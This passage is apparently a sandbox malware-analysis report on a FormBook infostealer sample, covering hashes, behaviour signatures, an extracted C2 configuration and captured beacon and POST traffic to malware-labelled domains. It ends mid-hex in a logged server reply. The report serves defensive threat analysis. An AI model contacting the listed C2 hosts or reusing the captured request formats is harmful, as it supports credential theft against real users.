Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample Name: Swift Copy.exe
Analysis ID: 682145
MD5: 50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1: 26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256: 0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection

Source: Swift Copy.exe Virustotal: Detection: 21%
Source: Swift Copy.exe ReversingLabs: Detection: 19%
Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.epic45.co.uk/bwe0/ Avira URL Cloud: Label: malware
Source: www.my1245.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== Avira URL Cloud: Label: malware
Source: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9 Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/ Avira URL Cloud: Label: malware
Source: http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe ReversingLabs: Detection: 19%
Source: 8.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}
Source: Swift Copy.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Swift Copy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80
Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe Network Connect: 103.67.235.120 80
Source: C:\Windows\explorer.exe Network Connect: 192.3.130.2 80
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe Network Connect: 51.159.175.169 80
Source: C:\Windows\explorer.exe Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe Domain query: www.expectedclosure.one
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\explorer.exe DNS query: www.blackyaga.xyz
Source: Malware configuration extractor URLs: www.my1245.com/bwe0/
Source: Joe Sandbox View ASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
Source: Joe Sandbox View ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 103.67.235.120
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.kinemartigues.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.kinemartigues.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kinemartigues.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.epic45.co.ukConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.epic45.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.epic45.co.uk/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
Source: global traffic HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.mogdento.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.mogdento.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mogdento.com/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 11 Aug 2022 04:29:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 